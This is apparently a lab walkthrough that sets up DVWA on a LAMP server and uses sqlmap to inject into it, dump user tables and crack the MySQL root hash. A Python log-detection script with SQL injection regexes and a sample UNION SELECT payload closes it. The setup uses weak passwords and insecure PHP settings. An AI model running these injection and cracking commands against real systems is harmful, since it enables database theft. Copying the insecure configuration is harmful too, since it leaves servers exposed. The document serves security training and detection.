yum install python -y
python -V
tar zxvf sqlmapproject-sqlmap-1.2.11-13-gabb911d.tar.gz
cd sqlmapproject-sqlmap-abb911d/
sqlmapproject-sqlmap-7eab1bc]# ls
doc lib procs shell sqlmap.conf tamper txt waf
extra plugins README.md sqlmapapi.py sqlmap.py thirdparty udf xml
3. Run sqlmap
[root@localhost sqlmapproject-sqlmap-abb911d]# ./sqlmap.py
4. Create a symbolic link for sqlmap
ln -s /root/sqlmapproject-sqlmap-abb911d/sqlmap.py /usr/bin/sqlmap
sqlmap -h # if the help text is displayed, the installation succeeded
5. Install the web application stack
yum install -y httpd php php-mysql php-gd mariadb-server mariadb mysql
systemctl start httpd && systemctl enable httpd
systemctl start mariadb && systemctl enable mariadb
3. Test the LAMP environment:
[root@xuegod63 ~]# vim /var/www/html/test.php
<?php
phpinfo();
?>
http://45.115.243.24/index.php
4. Set the password for the MySQL root user:
mysqladmin -u root password "123456"
mysql -u root -p123456
5. Upload the downloaded DVWA penetration-testing practice code to the Linux host and unzip it into the web root
unzip -d /var/www/html/ DVWA-master.zip
ls /var/www/html/
DVWA-master test.php
chown apache:apache /var/www/html/DVWA-master/ -R
6. Edit the DVWA configuration file /dvwa/config/config.inc.php and set the database details; user and password are the MySQL username and password.
vi /var/www/html/DVWA-master/config/config.inc.php.dist
vi /var/www/html/DVWA-master/config/config.inc.php
Change the following:
$_DVWA[ 'db_server' ] = '127.0.0.1';
$_DVWA[ 'db_database' ] = 'dvwa';
$_DVWA[ 'db_user' ] = 'root';
$_DVWA[ 'db_password' ] = '123456'; # just change this to your MySQL root password
cp /var/www/html/DVWA-master/config/config.inc.php.dist /var/www/html/DVWA-master/config/config.inc.php
http://45.115.243.24/DVWA-master/setup.php
Fixing the errors reported by the setup page:
vi /etc/php.ini
Change (line 815):
allow_url_include = Off
To:
allow_url_include = On
systemctl restart httpd
[root@xuegod63 ~]# vi /var/www/html/DVWA-master/config/config.inc.php
Change (lines 26 and 27):
$_DVWA[ 'recaptcha_public_key' ] = '';
$_DVWA[ 'recaptcha_private_key' ] = '';
To:
$_DVWA[ 'recaptcha_public_key' ] = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg';
$_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ';
http://45.115.243.24/DVWA-master/login.php
Log in with admin and password.
Injection
sqlmap -h
http://45.115.243.24/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#
Session cookie (PHPSESSID): o6fb5ftgc8baogcra5u8786571
Security level: low
sqlmap -u "http://45.115.243.24/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit" --cookie="security=low; PHPSESSID=o6fb5ftgc8baogcra5u8786571" -b --current-db --current-user
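Y # the DBMS has already been identified as MySQL, so skip the tests for other database types
n # answer n here; answer Y if you want to run the remaining MySQL tests as well, but Y makes the scan take considerably longer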
GET parameter[y/N]N
web server operating system: Linux CentOS 7-1708
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
banner: '5.5.60-MariaDB'
[20:17:55] [INFO] fetching current user
current user: 'root@localhost'
[20:17:55] [INFO] fetching current database
current database: 'dvwa'
[20:17:55] [INFO] fetched data logged to text files under '/root/.sqlmap/output/45.115.243.24'
sqlmap -u "http://45.115.243.24/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit" --cookie="security=low; PHPSESSID=o6fb5ftgc8baogcra5u8786571" -b --string="Surname" --users --passwords
Meaning of each prompt:
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]y
temporary [ˈtemprəri]: lasting only for a limited time
eventual [ɪˈventʃuəl]: happening at the end
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y # run a dictionary-based attack against the retrieved password hashes?
[1] default dictionary file '/root/sqlmapproject-sqlmap-abb911d/txt/wordlist.zip' (press Enter) # press Enter
[20:29:58] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[20:30:01] [INFO] starting dictionary-based cracking (mysql_passwd)
[20:30:01] [INFO] starting 8 processes
[20:30:01] [INFO] cracked password '123456' for user 'root'
database management system users password hashes:
[*] root [2]:
password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
clear-text password: 123456
sqlmap -u "http://45.115.243.24/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit" --cookie="security=low; PHPSESSID=o6fb5ftgc8baogcra5u8786571" -D dvwa --tables
sqlmap -u "http://45.115.243.24/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit" --cookie="security=low; PHPSESSID=o6fb5ftgc8baogcra5u8786571" -D dvwa -T users --columns
sqlmap -u "http://45.115.243.24/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit" --cookie="security=low; PHPSESSID=o6fb5ftgc8baogcra5u8786571" -D dvwa -T users -C user,password --dump
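Every sqlmap run above reaches the lab server as ordinary GET requests, so the Apache access log records them. The following is an added example (not part of the original walkthrough) that flags such requests in combined-format log lines; the function names, the regular expressions and the sample log lines are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Apache "combined" format: client, identity, user, [time], "request", status, size, "referer", "agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# SQL syntax that should never appear in this page's id/Submit parameters.
SQLI_RE = re.compile(
    r"('|--|#|/\*|\bunion\b.+\bselect\b|\binformation_schema\b"
    r"|\bsleep\s*\(|\b(and|or)\b\s+\d+\s*=\s*\d+)",
    re.IGNORECASE | re.DOTALL,
)

def classify(line):
    """Return (client_ip, reasons) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = []
    if "sqlmap" in m["ua"].lower():  # default User-Agent; a client can change it
        reasons.append("sqlmap-user-agent")
    query = urlsplit(m["target"]).query
    # parse_qs percent-decodes values, so encoded payloads are inspected in clear text
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if any(SQLI_RE.search(v) for v in values):
            reasons.append("sql-syntax-in-" + name)
    return m["ip"], reasons

def suspicious_clients(lines):
    """Count flagged requests per client IP."""
    hits = Counter()
    for line in lines:
        result = classify(line)
        if result and result[1]:
            hits[result[0]] += 1
    return dict(hits)

# Constructed sample lines using documentation addresses, not real server logs.
PATH = "/DVWA-master/vulnerabilities/sqli/"
SAMPLE = [
    f'192.0.2.10 - - [10/Dec/2018:20:15:01 +0800] "GET {PATH}?id=22&Submit=Submit HTTP/1.1" 200 4321 "-" "Mozilla/5.0"',
    f'198.51.100.7 - - [10/Dec/2018:20:17:40 +0800] "GET {PATH}?id=22&Submit=Submit HTTP/1.1" 200 4321 "-" "sqlmap/1.2.11 (http://sqlmap.org)"',
    f'198.51.100.7 - - [10/Dec/2018:20:17:41 +0800] "GET {PATH}?id=22%27%20UNION%20SELECT%20NULL%2CNULL--%20-&Submit=Submit HTTP/1.1" 200 4400 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(suspicious_clients(SAMPLE))
```

The third sample line shows why the parameter check matters: the User-Agent looks like a browser, and only the decoded `id` value gives the request away.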